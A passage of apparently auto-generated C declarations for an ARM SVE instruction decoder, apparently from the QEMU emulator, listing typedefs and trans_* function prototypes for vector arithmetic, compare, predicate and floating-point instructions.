static bool trans_AND_zpzz(DisasContext *ctx, arg_AND_zpzz *a); typedef arg_rprr_esz arg_BIC_zpzz; static bool trans_BIC_zpzz(DisasContext *ctx, arg_BIC_zpzz *a); typedef arg_rprr_esz arg_ADD_zpzz; static bool trans_ADD_zpzz(DisasContext *ctx, arg_ADD_zpzz *a); typedef arg_rprr_esz arg_SUB_zpzz; static bool trans_SUB_zpzz(DisasContext *ctx, arg_SUB_zpzz *a); typedef arg_rprr_esz arg_SMAX_zpzz; static bool trans_SMAX_zpzz(DisasContext *ctx, arg_SMAX_zpzz *a); typedef arg_rprr_esz arg_UMAX_zpzz; static bool trans_UMAX_zpzz(DisasContext *ctx, arg_UMAX_zpzz *a); typedef arg_rprr_esz arg_SMIN_zpzz; static bool trans_SMIN_zpzz(DisasContext *ctx, arg_SMIN_zpzz *a); typedef arg_rprr_esz arg_UMIN_zpzz; static bool trans_UMIN_zpzz(DisasContext *ctx, arg_UMIN_zpzz *a); typedef arg_rprr_esz arg_SABD_zpzz; static bool trans_SABD_zpzz(DisasContext *ctx, arg_SABD_zpzz *a); typedef arg_rprr_esz arg_UABD_zpzz; static bool trans_UABD_zpzz(DisasContext *ctx, arg_UABD_zpzz *a); typedef arg_rprr_esz arg_MUL_zpzz; static bool trans_MUL_zpzz(DisasContext *ctx, arg_MUL_zpzz *a); typedef arg_rprr_esz arg_SMULH_zpzz; static bool trans_SMULH_zpzz(DisasContext *ctx, arg_SMULH_zpzz *a); typedef arg_rprr_esz arg_UMULH_zpzz; static bool trans_UMULH_zpzz(DisasContext *ctx, arg_UMULH_zpzz *a); typedef arg_rprr_esz arg_SDIV_zpzz; static bool trans_SDIV_zpzz(DisasContext *ctx, arg_SDIV_zpzz *a); typedef arg_rprr_esz arg_UDIV_zpzz; static bool trans_UDIV_zpzz(DisasContext *ctx, arg_UDIV_zpzz *a); typedef arg_rpr_esz arg_ORV; static bool trans_ORV(DisasContext *ctx, arg_ORV *a); typedef arg_rpr_esz arg_EORV; static bool trans_EORV(DisasContext *ctx, arg_EORV *a); typedef arg_rpr_esz arg_ANDV; static bool trans_ANDV(DisasContext *ctx, arg_ANDV *a); typedef arg_rpr_esz arg_MOVPRFX_z; static bool trans_MOVPRFX_z(DisasContext *ctx, arg_MOVPRFX_z *a); typedef arg_rpr_esz arg_MOVPRFX_m; static bool trans_MOVPRFX_m(DisasContext *ctx, arg_MOVPRFX_m *a); typedef arg_rpr_esz arg_UADDV; static bool trans_UADDV(DisasContext *ctx, arg_UADDV *a); typedef arg_rpr_esz arg_SADDV; static bool trans_SADDV(DisasContext *ctx, arg_SADDV *a); typedef arg_rpr_esz arg_SMAXV; static bool trans_SMAXV(DisasContext *ctx, arg_SMAXV *a); typedef arg_rpr_esz arg_UMAXV; static bool trans_UMAXV(DisasContext *ctx, arg_UMAXV *a); typedef arg_rpr_esz arg_SMINV; static bool trans_SMINV(DisasContext *ctx, arg_SMINV *a); typedef arg_rpr_esz arg_UMINV; static bool trans_UMINV(DisasContext *ctx, arg_UMINV *a); typedef arg_rpri_esz arg_ASR_zpzi; static bool trans_ASR_zpzi(DisasContext *ctx, arg_ASR_zpzi *a); typedef arg_rpri_esz arg_LSR_zpzi; static bool trans_LSR_zpzi(DisasContext *ctx, arg_LSR_zpzi *a); typedef arg_rpri_esz arg_LSL_zpzi; static bool trans_LSL_zpzi(DisasContext *ctx, arg_LSL_zpzi *a); typedef arg_rpri_esz arg_ASRD; static bool trans_ASRD(DisasContext *ctx, arg_ASRD *a); typedef arg_rprr_esz arg_ASR_zpzz; static bool trans_ASR_zpzz(DisasContext *ctx, arg_ASR_zpzz *a); typedef arg_rprr_esz arg_LSR_zpzz; static bool trans_LSR_zpzz(DisasContext *ctx, arg_LSR_zpzz *a); typedef arg_rprr_esz arg_LSL_zpzz; static bool trans_LSL_zpzz(DisasContext *ctx, arg_LSL_zpzz *a); typedef arg_rprr_esz arg_ASR_zpzw; static bool trans_ASR_zpzw(DisasContext *ctx, arg_ASR_zpzw *a); typedef arg_rprr_esz arg_LSR_zpzw; static bool trans_LSR_zpzw(DisasContext *ctx, arg_LSR_zpzw *a); typedef arg_rprr_esz arg_LSL_zpzw; static bool trans_LSL_zpzw(DisasContext *ctx, arg_LSL_zpzw *a); typedef arg_rpr_esz arg_CLS; static bool trans_CLS(DisasContext *ctx, arg_CLS *a); typedef arg_rpr_esz arg_CLZ; static bool trans_CLZ(DisasContext *ctx, arg_CLZ *a); typedef arg_rpr_esz arg_CNT_zpz; static bool trans_CNT_zpz(DisasContext *ctx, arg_CNT_zpz *a); typedef arg_rpr_esz arg_CNOT; static bool trans_CNOT(DisasContext *ctx, arg_CNOT *a); typedef arg_rpr_esz arg_NOT_zpz; static bool trans_NOT_zpz(DisasContext *ctx, arg_NOT_zpz *a); typedef arg_rpr_esz arg_FABS; static bool trans_FABS(DisasContext *ctx, arg_FABS *a); typedef arg_rpr_esz arg_FNEG; static bool trans_FNEG(DisasContext *ctx, arg_FNEG *a); typedef arg_rpr_esz arg_ABS; static bool trans_ABS(DisasContext *ctx, arg_ABS *a); typedef arg_rpr_esz arg_NEG; static bool trans_NEG(DisasContext *ctx, arg_NEG *a); typedef arg_rpr_esz arg_SXTB; static bool trans_SXTB(DisasContext *ctx, arg_SXTB *a); typedef arg_rpr_esz arg_UXTB; static bool trans_UXTB(DisasContext *ctx, arg_UXTB *a); typedef arg_rpr_esz arg_SXTH; static bool trans_SXTH(DisasContext *ctx, arg_SXTH *a); typedef arg_rpr_esz arg_UXTH; static bool trans_UXTH(DisasContext *ctx, arg_UXTH *a); typedef arg_rpr_esz arg_SXTW; static bool trans_SXTW(DisasContext *ctx, arg_SXTW *a); typedef arg_rpr_esz arg_UXTW; static bool trans_UXTW(DisasContext *ctx, arg_UXTW *a); typedef arg_rprr_esz arg_FCMGE_ppzz; static bool trans_FCMGE_ppzz(DisasContext *ctx, arg_FCMGE_ppzz *a); typedef arg_rprr_esz arg_FCMGT_ppzz; static bool trans_FCMGT_ppzz(DisasContext *ctx, arg_FCMGT_ppzz *a); typedef arg_rprr_esz arg_FCMEQ_ppzz; static bool trans_FCMEQ_ppzz(DisasContext *ctx, arg_FCMEQ_ppzz *a); typedef arg_rprr_esz arg_FCMNE_ppzz; static bool trans_FCMNE_ppzz(DisasContext *ctx, arg_FCMNE_ppzz *a); typedef arg_rprr_esz arg_FCMUO_ppzz; static bool trans_FCMUO_ppzz(DisasContext *ctx, arg_FCMUO_ppzz *a); typedef arg_rprr_esz arg_FACGE_ppzz; static bool trans_FACGE_ppzz(DisasContext *ctx, arg_FACGE_ppzz *a); typedef arg_rprr_esz arg_FACGT_ppzz; static bool trans_FACGT_ppzz(DisasContext *ctx, arg_FACGT_ppzz *a); typedef arg_rprrr_esz arg_MLA; static bool trans_MLA(DisasContext *ctx, arg_MLA *a); typedef arg_rprrr_esz arg_MLS; static bool trans_MLS(DisasContext *ctx, arg_MLS *a); typedef arg_rrr_esz arg_ADD_zzz; static bool trans_ADD_zzz(DisasContext *ctx, arg_ADD_zzz *a); typedef arg_rrr_esz arg_SUB_zzz; static bool trans_SUB_zzz(DisasContext *ctx, arg_SUB_zzz *a); typedef arg_rrr_esz arg_SQADD_zzz; static bool trans_SQADD_zzz(DisasContext *ctx, arg_SQADD_zzz *a); typedef arg_rrr_esz arg_UQADD_zzz; static bool trans_UQADD_zzz(DisasContext *ctx, arg_UQADD_zzz *a); typedef arg_rrr_esz arg_SQSUB_zzz; static bool trans_SQSUB_zzz(DisasContext *ctx, arg_SQSUB_zzz *a); typedef arg_rrr_esz arg_UQSUB_zzz; static bool trans_UQSUB_zzz(DisasContext *ctx, arg_UQSUB_zzz *a); typedef arg_rrr_esz arg_AND_zzz; static bool trans_AND_zzz(DisasContext *ctx, arg_AND_zzz *a); typedef arg_rrr_esz arg_ORR_zzz; static bool trans_ORR_zzz(DisasContext *ctx, arg_ORR_zzz *a); typedef arg_rrr_esz arg_EOR_zzz; static bool trans_EOR_zzz(DisasContext *ctx, arg_EOR_zzz *a); typedef arg_rrr_esz arg_BIC_zzz; static bool trans_BIC_zzz(DisasContext *ctx, arg_BIC_zzz *a); typedef arg_disas_sve25 arg_INDEX_ii; static bool trans_INDEX_ii(DisasContext *ctx, arg_INDEX_ii *a); typedef arg_disas_sve26 arg_INDEX_ir; static bool trans_INDEX_ir(DisasContext *ctx, arg_INDEX_ir *a); typedef arg_rri_esz arg_INDEX_ri; static bool trans_INDEX_ri(DisasContext *ctx, arg_INDEX_ri *a); typedef arg_rrr_esz arg_INDEX_rr; static bool trans_INDEX_rr(DisasContext *ctx, arg_INDEX_rr *a); typedef arg_rri arg_ADDVL; static bool trans_ADDVL(DisasContext *ctx, arg_ADDVL *a); typedef arg_rri arg_ADDPL; static bool trans_ADDPL(DisasContext *ctx, arg_ADDPL *a); typedef arg_disas_sve27 arg_RDVL; static bool trans_RDVL(DisasContext *ctx, arg_RDVL *a); typedef arg_rri_esz arg_ASR_zzi; static bool trans_ASR_zzi(DisasContext *ctx, arg_ASR_zzi *a); typedef arg_rri_esz arg_LSR_zzi; static bool trans_LSR_zzi(DisasContext *ctx, arg_LSR_zzi *a); typedef arg_rri_esz arg_LSL_zzi; static bool trans_LSL_zzi(DisasContext *ctx, arg_LSL_zzi *a); typedef arg_rrr_esz arg_ASR_zzw; static bool trans_ASR_zzw(DisasContext *ctx, arg_ASR_zzw *a); typedef arg_rrr_esz arg_LSR_zzw; static bool trans_LSR_zzw(DisasContext *ctx, arg_LSR_zzw *a); typedef arg_rrr_esz arg_LSL_zzw; static bool trans_LSL_zzw(DisasContext *ctx, arg_LSL_zzw *a); typedef arg_rrri arg_ADR_s32; static bool trans_ADR_s32(DisasContext *ctx, arg_ADR_s32 *a); typedef arg_rrri arg_ADR_u32; static bool trans_ADR_u32(DisasContext *ctx, arg_ADR_u32 *a); typedef arg_rrri arg_ADR_p32; static bool trans_ADR_p32(DisasContext *ctx, arg_ADR_p32 *a); typedef arg_rrri arg_ADR_p64; static bool trans_ADR_p64(DisasContext *ctx, arg_ADR_p64 *a); typedef arg_disas_sve28 arg_MOVPRFX; static bool trans_MOVPRFX(DisasContext *ctx, arg_MOVPRFX *a); typedef arg_rr_esz arg_FEXPA; static bool trans_FEXPA(DisasContext *ctx, arg_FEXPA *a); typedef arg_rrr_esz arg_FTSSEL; static bool trans_FTSSEL(DisasContext *ctx, arg_FTSSEL *a); typedef arg_incdec_cnt arg_CNT_r; static bool trans_CNT_r(DisasContext *ctx, arg_CNT_r *a); typedef arg_incdec_cnt arg_INCDEC_r; static bool trans_INCDEC_r(DisasContext *ctx, arg_INCDEC_r *a); typedef arg_incdec_cnt arg_SINCDEC_r_32; static bool trans_SINCDEC_r_32(DisasContext *ctx, arg_SINCDEC_r_32 *a); typedef arg_incdec_cnt arg_SINCDEC_r_64; static bool trans_SINCDEC_r_64(DisasContext *ctx, arg_SINCDEC_r_64 *a); typedef arg_incdec2_cnt arg_INCDEC_v; static bool trans_INCDEC_v(DisasContext *ctx, arg_INCDEC_v *a); typedef arg_incdec2_cnt arg_SINCDEC_v; static bool trans_SINCDEC_v(DisasContext *ctx, arg_SINCDEC_v *a); typedef arg_rr_dbm arg_ORR_zzi; static bool trans_ORR_zzi(DisasContext *ctx, arg_ORR_zzi *a); typedef arg_rr_dbm arg_EOR_zzi; static bool trans_EOR_zzi(DisasContext *ctx, arg_EOR_zzi *a); typedef arg_rr_dbm arg_AND_zzi; static bool trans_AND_zzi(DisasContext *ctx, arg_AND_zzi *a); typedef arg_disas_sve29 arg_DUPM; static bool trans_DUPM(DisasContext *ctx, arg_DUPM *a); typedef arg_rpri_esz arg_FCPY; static bool trans_FCPY(DisasContext *ctx, arg_FCPY *a); typedef arg_rpri_esz arg_CPY_m_i; static bool trans_CPY_m_i(DisasContext *ctx, arg_CPY_m_i *a); typedef arg_rpri_esz arg_CPY_z_i; static bool trans_CPY_z_i(DisasContext *ctx, arg_CPY_z_i *a); typedef arg_rrri arg_EXT; static bool trans_EXT(DisasContext *ctx, arg_EXT *a); typedef arg_rr_esz arg_DUP_s; static bool trans_DUP_s(DisasContext *ctx, arg_DUP_s *a); typedef arg_rri arg_DUP_x; static bool trans_DUP_x(DisasContext *ctx, arg_DUP_x *a); typedef arg_rrr_esz arg_INSR_f; static bool trans_INSR_f(DisasContext *ctx, arg_INSR_f *a); typedef arg_rrr_esz arg_INSR_r; static bool trans_INSR_r(DisasContext *ctx, arg_INSR_r *a); typedef arg_rr_esz arg_REV_v; static bool trans_REV_v(DisasContext *ctx, arg_REV_v *a); typedef arg_rrr_esz arg_TBL; static bool trans_TBL(DisasContext *ctx, arg_TBL *a); typedef arg_disas_sve30 arg_UNPK; static bool trans_UNPK(DisasContext *ctx, arg_UNPK *a); typedef arg_rrr_esz arg_ZIP1_p; static bool trans_ZIP1_p(DisasContext *ctx, arg_ZIP1_p *a); typedef arg_rrr_esz arg_ZIP2_p; static bool trans_ZIP2_p(DisasContext *ctx, arg_ZIP2_p *a); typedef arg_rrr_esz arg_UZP1_p; static bool trans_UZP1_p(DisasContext *ctx, arg_UZP1_p *a); typedef arg_rrr_esz arg_UZP2_p; static bool trans_UZP2_p(DisasContext *ctx, arg_UZP2_p *a); typedef arg_rrr_esz arg_TRN1_p; static bool trans_TRN1_p(DisasContext *ctx, arg_TRN1_p *a); typedef arg_rrr_esz arg_TRN2_p; static bool trans_TRN2_p(DisasContext *ctx, arg_TRN2_p *a); typedef arg_rr_esz arg_REV_p; static bool trans_REV_p(DisasContext *ctx, arg_REV_p *a); typedef arg_rr_esz arg_PUNPKLO; static bool trans_PUNPKLO(DisasContext *ctx, arg_PUNPKLO *a); typedef arg_rr_esz arg_PUNPKHI; static bool trans_PUNPKHI(DisasContext *ctx, arg_PUNPKHI *a); typedef arg_rrr_esz arg_ZIP1_z; static bool trans_ZIP1_z(DisasContext *ctx, arg_ZIP1_z *a); typedef arg_rrr_esz arg_ZIP2_z; static bool trans_ZIP2_z(DisasContext *ctx, arg_ZIP2_z *a); typedef arg_rrr_esz arg_UZP1_z; static bool trans_UZP1_z(DisasContext *ctx, arg_UZP1_z *a); typedef arg_rrr_esz arg_UZP2_z; static bool trans_UZP2_z(DisasContext *ctx, arg_UZP2_z *a); typedef arg_rrr_esz arg_TRN1_z; static bool trans_TRN1_z(DisasContext *ctx, arg_TRN1_z *a); typedef arg_rrr_esz arg_TRN2_z; static bool trans_TRN2_z(DisasContext *ctx, arg_TRN2_z *a); typedef arg_rpr_esz arg_COMPACT; static bool trans_COMPACT(DisasContext *ctx, arg_COMPACT *a); typedef arg_rprr_esz arg_CLASTA_z; static bool trans_CLASTA_z(DisasContext *ctx, arg_CLASTA_z *a); typedef arg_rprr_esz arg_CLASTB_z; static bool trans_CLASTB_z(DisasContext *ctx, arg_CLASTB_z *a); typedef arg_rpr_esz arg_CLASTA_v; static bool trans_CLASTA_v(DisasContext *ctx, arg_CLASTA_v *a); typedef arg_rpr_esz arg_CLASTB_v; static bool trans_CLASTB_v(DisasContext *ctx, arg_CLASTB_v *a); typedef arg_rpr_esz arg_CLASTA_r; static bool trans_CLASTA_r(DisasContext *ctx, arg_CLASTA_r *a); typedef arg_rpr_esz arg_CLASTB_r; static bool trans_CLASTB_r(DisasContext *ctx, arg_CLASTB_r *a); typedef arg_rpr_esz arg_LASTA_v; static bool trans_LASTA_v(DisasContext *ctx, arg_LASTA_v *a); typedef arg_rpr_esz arg_LASTB_v; static bool trans_LASTB_v(DisasContext *ctx, arg_LASTB_v *a); typedef arg_rpr_esz arg_LASTA_r; static bool trans_LASTA_r(DisasContext *ctx, arg_LASTA_r *a); typedef arg_rpr_esz arg_LASTB_r; static bool trans_LASTB_r(DisasContext *ctx, arg_LASTB_r *a); typedef arg_rpr_esz arg_CPY_m_v; static bool trans_CPY_m_v(DisasContext *ctx, arg_CPY_m_v *a); typedef arg_rpr_esz arg_CPY_m_r; static bool trans_CPY_m_r(DisasContext *ctx, arg_CPY_m_r *a); typedef arg_rpr_esz arg_REVB; static bool trans_REVB(DisasContext *ctx, arg_REVB *a); typedef arg_rpr_esz arg_REVH; static bool trans_REVH(DisasContext *ctx, arg_REVH *a); typedef arg_rpr_esz arg_REVW; static bool trans_REVW(DisasContext *ctx, arg_REVW *a); typedef arg_rpr_esz arg_RBIT; static bool trans_RBIT(DisasContext *ctx, arg_RBIT *a); typedef arg_rprr_esz arg_SPLICE; static bool trans_SPLICE(DisasContext *ctx, arg_SPLICE *a); typedef arg_rprr_esz arg_SEL_zpzz; static bool trans_SEL_zpzz(DisasContext *ctx, arg_SEL_zpzz *a); typedef arg_rprr_esz arg_CMPHS_ppzz; static bool trans_CMPHS_ppzz(DisasContext *ctx, arg_CMPHS_ppzz *a); typedef arg_rprr_esz arg_CMPHI_ppzz; static bool trans_CMPHI_ppzz(DisasContext *ctx, arg_CMPHI_ppzz *a); typedef arg_rprr_esz arg_CMPGE_ppzz; static bool trans_CMPGE_ppzz(DisasContext *ctx, arg_CMPGE_ppzz *a); typedef arg_rprr_esz arg_CMPGT_ppzz; static bool trans_CMPGT_ppzz(DisasContext *ctx, arg_CMPGT_ppzz *a); typedef arg_rprr_esz arg_CMPEQ_ppzz; static bool trans_CMPEQ_ppzz(DisasContext *ctx, arg_CMPEQ_ppzz *a); typedef arg_rprr_esz arg_CMPNE_ppzz; static bool trans_CMPNE_ppzz(DisasContext *ctx, arg_CMPNE_ppzz *a); typedef arg_rprr_esz arg_CMPEQ_ppzw; static bool trans_CMPEQ_ppzw(DisasContext *ctx, arg_CMPEQ_ppzw *a); typedef arg_rprr_esz arg_CMPNE_ppzw; static bool trans_CMPNE_ppzw(DisasContext *ctx, arg_CMPNE_ppzw *a); typedef arg_rprr_esz arg_CMPGE_ppzw; static bool trans_CMPGE_ppzw(DisasContext *ctx, arg_CMPGE_ppzw *a); typedef arg_rprr_esz arg_CMPGT_ppzw; static bool trans_CMPGT_ppzw(DisasContext *ctx, arg_CMPGT_ppzw *a); typedef arg_rprr_esz arg_CMPLT_ppzw; static bool trans_CMPLT_ppzw(DisasContext *ctx, arg_CMPLT_ppzw *a); typedef arg_rprr_esz arg_CMPLE_ppzw; static bool trans_CMPLE_ppzw(DisasContext *ctx, arg_CMPLE_ppzw *a); typedef arg_rprr_esz arg_CMPHS_ppzw; static bool trans_CMPHS_ppzw(DisasContext *ctx, arg_CMPHS_ppzw *a); typedef arg_rprr_esz arg_CMPHI_ppzw; static bool trans_CMPHI_ppzw(DisasContext *ctx, arg_CMPHI_ppzw *a); typedef arg_rprr_esz arg_CMPLO_ppzw; static bool trans_CMPLO_ppzw(DisasContext *ctx, arg_CMPLO_ppzw *a); typedef arg_rprr_esz arg_CMPLS_ppzw; static bool trans_CMPLS_ppzw(DisasContext *ctx, arg_CMPLS_ppzw *a); typedef arg_rpri_esz arg_CMPHS_ppzi; static bool trans_CMPHS_ppzi(DisasContext *ctx, arg_CMPHS_ppzi *a); typedef arg_rpri_esz arg_CMPHI_ppzi; static bool trans_CMPHI_ppzi(DisasContext *ctx, arg_CMPHI_ppzi *a); typedef arg_rpri_esz arg_CMPLO_ppzi; static bool trans_CMPLO_ppzi(DisasContext *ctx, arg_CMPLO_ppzi *a); typedef arg_rpri_esz arg_CMPLS_ppzi; static bool trans_CMPLS_ppzi(DisasContext *ctx, arg_CMPLS_ppzi *a); typedef arg_rpri_esz arg_CMPGE_ppzi; static bool trans_CMPGE_ppzi(DisasContext *ctx, arg_CMPGE_ppzi *a); typedef arg_rpri_esz arg_CMPGT_ppzi; static bool trans_CMPGT_ppzi(DisasContext *ctx, arg_CMPGT_ppzi *a); typedef arg_rpri_esz arg_CMPLT_ppzi; static bool trans_CMPLT_ppzi(DisasContext *ctx, arg_CMPLT_ppzi *a); typedef arg_rpri_esz arg_CMPLE_ppzi; static bool trans_CMPLE_ppzi(DisasContext *ctx, arg_CMPLE_ppzi *a); typedef arg_rpri_esz arg_CMPEQ_ppzi; static bool trans_CMPEQ_ppzi(DisasContext *ctx, arg_CMPEQ_ppzi *a); typedef arg_rpri_esz arg_CMPNE_ppzi; static bool trans_CMPNE_ppzi(DisasContext *ctx, arg_CMPNE_ppzi *a); typedef arg_rprr_s arg_AND_pppp; static bool trans_AND_pppp(DisasContext *ctx, arg_AND_pppp *a); typedef arg_rprr_s arg_BIC_pppp; static bool trans_BIC_pppp(DisasContext *ctx, arg_BIC_pppp *a); typedef arg_rprr_s arg_EOR_pppp; static bool trans_EOR_pppp(DisasContext *ctx, arg_EOR_pppp *a); typedef arg_rprr_s arg_SEL_pppp; static bool trans_SEL_pppp(DisasContext *ctx, arg_SEL_pppp *a); typedef arg_rprr_s arg_ORR_pppp; static bool trans_ORR_pppp(DisasContext *ctx, arg_ORR_pppp *a); typedef arg_rprr_s arg_ORN_pppp; static bool trans_ORN_pppp(DisasContext *ctx, arg_ORN_pppp *a); typedef arg_rprr_s arg_NOR_pppp; static bool trans_NOR_pppp(DisasContext *ctx, arg_NOR_pppp *a); typedef arg_rprr_s arg_NAND_pppp; static bool trans_NAND_pppp(DisasContext *ctx, arg_NAND_pppp *a); typedef arg_disas_sve31 arg_PTEST; static bool trans_PTEST(DisasContext *ctx, arg_PTEST *a); typedef arg_ptrue arg_PTRUE; static bool trans_PTRUE(DisasContext *ctx, arg_PTRUE *a); typedef arg_disas_sve32 arg_SETFFR; static bool trans_SETFFR(DisasContext *ctx, arg_SETFFR *a); typedef arg_disas_sve33 arg_PFALSE; static bool trans_PFALSE(DisasContext *ctx, arg_PFALSE *a); typedef arg_disas_sve34 arg_RDFFR_p; static bool trans_RDFFR_p(DisasContext *ctx, arg_RDFFR_p *a); typedef arg_disas_sve33 arg_RDFFR; static bool trans_RDFFR(DisasContext *ctx, arg_RDFFR *a); typedef arg_disas_sve35 arg_WRFFR; static bool trans_WRFFR(DisasContext *ctx, arg_WRFFR *a); typedef arg_rr_esz arg_PFIRST; static bool trans_PFIRST(DisasContext *ctx, arg_PFIRST *a); typedef arg_rr_esz arg_PNEXT; static bool trans_PNEXT(DisasContext *ctx, arg_PNEXT *a); typedef arg_rprr_s arg_BRKPA; static bool trans_BRKPA(DisasContext *ctx, arg_BRKPA *a); typedef arg_rprr_s arg_BRKPB; static bool trans_BRKPB(DisasContext *ctx, arg_BRKPB *a); typedef arg_rpr_s arg_BRKA_z; static bool trans_BRKA_z(DisasContext *ctx, arg_BRKA_z *a); typedef arg_rpr_s arg_BRKB_z; static bool trans_BRKB_z(DisasContext *ctx, arg_BRKB_z *a); typedef arg_rpr_s arg_BRKA_m; static bool trans_BRKA_m(DisasContext *ctx, arg_BRKA_m *a); typedef arg_rpr_s arg_BRKB_m; static bool trans_BRKB_m(DisasContext *ctx, arg_BRKB_m *a); typedef arg_rpr_s arg_BRKN; static bool trans_BRKN(DisasContext *ctx, arg_BRKN *a); typedef arg_rpr_esz arg_CNTP; static bool trans_CNTP(DisasContext *ctx, arg_CNTP *a); typedef arg_incdec_pred arg_INCDECP_r; static bool trans_INCDECP_r(DisasContext *ctx, arg_INCDECP_r *a); typedef arg_incdec2_pred arg_INCDECP_z; static bool trans_INCDECP_z(DisasContext *ctx, arg_INCDECP_z *a); typedef arg_incdec_pred arg_SINCDECP_r_32; static bool trans_SINCDECP_r_32(DisasContext *ctx, arg_SINCDECP_r_32 *a); typedef arg_incdec_pred arg_SINCDECP_r_64; static bool trans_SINCDECP_r_64(DisasContext *ctx, arg_SINCDECP_r_64 *a); typedef arg_incdec2_pred arg_SINCDECP_z; static bool trans_SINCDECP_z(DisasContext *ctx, arg_SINCDECP_z *a); typedef arg_disas_sve36 arg_CTERM; static bool trans_CTERM(DisasContext *ctx, arg_CTERM *a); typedef arg_disas_sve37 arg_WHILE; static bool trans_WHILE(DisasContext *ctx, arg_WHILE *a); typedef arg_disas_sve38 arg_FDUP; static bool trans_FDUP(DisasContext *ctx, arg_FDUP *a); typedef arg_disas_sve38 arg_DUP_i; static bool trans_DUP_i(DisasContext *ctx, arg_DUP_i *a); typedef arg_rri_esz arg_ADD_zzi; static bool trans_ADD_zzi(DisasContext *ctx, arg_ADD_zzi *a); typedef arg_rri_esz arg_SUB_zzi; static bool trans_SUB_zzi(DisasContext *ctx, arg_SUB_zzi *a); typedef arg_rri_esz arg_SUBR_zzi; static bool trans_SUBR_zzi(DisasContext *ctx, arg_SUBR_zzi *a); typedef arg_rri_esz arg_SQADD_zzi; static bool trans_SQADD_zzi(DisasContext *ctx, arg_SQADD_zzi *a); typedef arg_rri_esz arg_UQADD_zzi; static bool trans_UQADD_zzi(DisasContext *ctx, arg_UQADD_zzi *a); typedef arg_rri_esz arg_SQSUB_zzi; static bool trans_SQSUB_zzi(DisasContext *ctx, arg_SQSUB_zzi *a); typedef arg_rri_esz arg_UQSUB_zzi; static bool trans_UQSUB_zzi(DisasContext *ctx, arg_UQSUB_zzi *a); typedef arg_rri_esz arg_SMAX_zzi; static bool trans_SMAX_zzi(DisasContext *ctx, arg_SMAX_zzi *a); typedef arg_rri_esz arg_UMAX_zzi; static bool trans_UMAX_zzi(DisasContext *ctx, arg_UMAX_zzi *a); typedef arg_rri_esz arg_SMIN_zzi; static bool trans_SMIN_zzi(DisasContext *ctx, arg_SMIN_zzi *a); typedef arg_rri_esz arg_UMIN_zzi; static bool trans_UMIN_zzi(DisasContext *ctx, arg_UMIN_zzi *a); typedef arg_rri_esz arg_MUL_zzi; static bool trans_MUL_zzi(DisasContext *ctx, arg_MUL_zzi *a); typedef arg_disas_sve39 arg_DOT_zzz; static bool trans_DOT_zzz(DisasContext *ctx, arg_DOT_zzz *a); typedef arg_disas_sve40 arg_DOT_zzx; static bool trans_DOT_zzx(DisasContext *ctx, arg_DOT_zzx *a); typedef arg_disas_sve41 arg_FCADD; static bool trans_FCADD(DisasContext *ctx, arg_FCADD *a); typedef arg_disas_sve42 arg_FCMLA_zpzzz; static bool trans_FCMLA_zpzzz(DisasContext *ctx, arg_FCMLA_zpzzz *a); typedef arg_disas_sve43 arg_FCMLA_zzxz; static bool trans_FCMLA_zzxz(DisasContext *ctx, arg_FCMLA_zzxz *a); typedef arg_disas_sve44 arg_FMLA_zzxz; static bool trans_FMLA_zzxz(DisasContext *ctx, arg_FMLA_zzxz *a); typedef arg_disas_sve45 arg_FMUL_zzx; static bool trans_FMUL_zzx(DisasContext *ctx, arg_FMUL_zzx *a); typedef arg_rpr_esz arg_FADDV; static bool trans_FADDV(DisasContext *ctx, arg_FADDV *a); typedef arg_rpr_esz arg_FMAXNMV; static bool trans_FMAXNMV(DisasContext *ctx, arg_FMAXNMV *a); typedef arg_rpr_esz arg_FMINNMV; static bool trans_FMINNMV(DisasContext *ctx, arg_FMINNMV *a); typedef arg_rpr_esz arg_FMAXV; static bool trans_FMAXV(DisasContext *ctx, arg_FMAXV *a); typedef arg_rpr_esz arg_FMINV; static bool trans_FMINV(DisasContext *ctx, arg_FMINV *a); typedef arg_rr_esz arg_FRECPE; static bool trans_FRECPE(DisasContext *ctx, arg_FRECPE *a); typedef arg_rr_esz arg_FRSQRTE; static bool trans_FRSQRTE(DisasContext *ctx, arg_FRSQRTE *a); typedef arg_rpr_esz arg_FCMGE_ppz0; static bool trans_FCMGE_ppz0(DisasContext *ctx, arg_FCMGE_ppz0 *a); typedef arg_rpr_esz arg_FCMGT_ppz0; static bool trans_FCMGT_ppz0(DisasContext *ctx, arg_FCMGT_ppz0 *a); typedef arg_rpr_esz arg_FCMLT_ppz0; static bool trans_FCMLT_ppz0(DisasContext *ctx, arg_FCMLT_ppz0 *a); typedef arg_rpr_esz arg_FCMLE_ppz0; static bool trans_FCMLE_ppz0(DisasContext *ctx, arg_FCMLE_ppz0 *a); typedef arg_rpr_esz arg_FCMEQ_ppz0; static bool trans_FCMEQ_ppz0(DisasContext *ctx, arg_FCMEQ_ppz0 *a); typedef arg_rpr_esz arg_FCMNE_ppz0; static bool trans_FCMNE_ppz0(DisasContext *ctx, arg_FCMNE_ppz0 *a); typedef arg_rprr_esz arg_FADDA; static bool trans_FADDA(DisasContext *ctx, arg_FADDA *a); typedef arg_rrr_esz arg_FADD_zzz; static bool trans_FADD_zzz(DisasContext *ctx, arg_FADD_zzz *a); typedef arg_rrr_esz arg_FSUB_zzz; static bool trans_FSUB_zzz(DisasContext *ctx, arg_FSUB_zzz *a); typedef arg_rrr_esz arg_FMUL_zzz; static bool trans_FMUL_zzz(DisasContext *ctx, arg_FMUL_zzz *a); typedef arg_rrr_esz arg_FTSMUL; static bool trans_FTSMUL(DisasContext *ctx, arg_FTSMUL *a); typedef arg_rrr_esz arg_FRECPS; static bool trans_FRECPS(DisasContext *ctx, arg_FRECPS *a); typedef arg_rrr_esz arg_FRSQRTS; static bool trans_FRSQRTS(DisasContext *ctx, arg_FRSQRTS *a); typedef arg_rprr_esz arg_FADD_zpzz; static bool trans_FADD_zpzz(DisasContext *ctx, arg_FADD_zpzz *a); typedef arg_rprr_esz arg_FSUB_zpzz; static bool trans_FSUB_zpzz(DisasContext *ctx, arg_FSUB_zpzz *a); typedef arg_rprr_esz arg_FMUL_zpzz; static bool trans_FMUL_zpzz(DisasContext *ctx, arg_FMUL_zpzz *a); typedef arg_rprr_esz arg_FMAXNM_zpzz; static bool trans_FMAXNM_zpzz(DisasContext *ctx, arg_FMAXNM_zpzz *a); typedef arg_rprr_esz arg_FMINNM_zpzz; static bool trans_FMINNM_zpzz(DisasContext *ctx, arg_FMINNM_zpzz *a); typedef arg_rprr_esz arg_FMAX_zpzz; static bool trans_FMAX_zpzz(DisasContext *ctx, arg_FMAX_zpzz *a); typedef arg_rprr_esz arg_FMIN_zpzz; static bool trans_FMIN_zpzz(DisasContext *ctx, arg_FMIN_zpzz *a); typedef 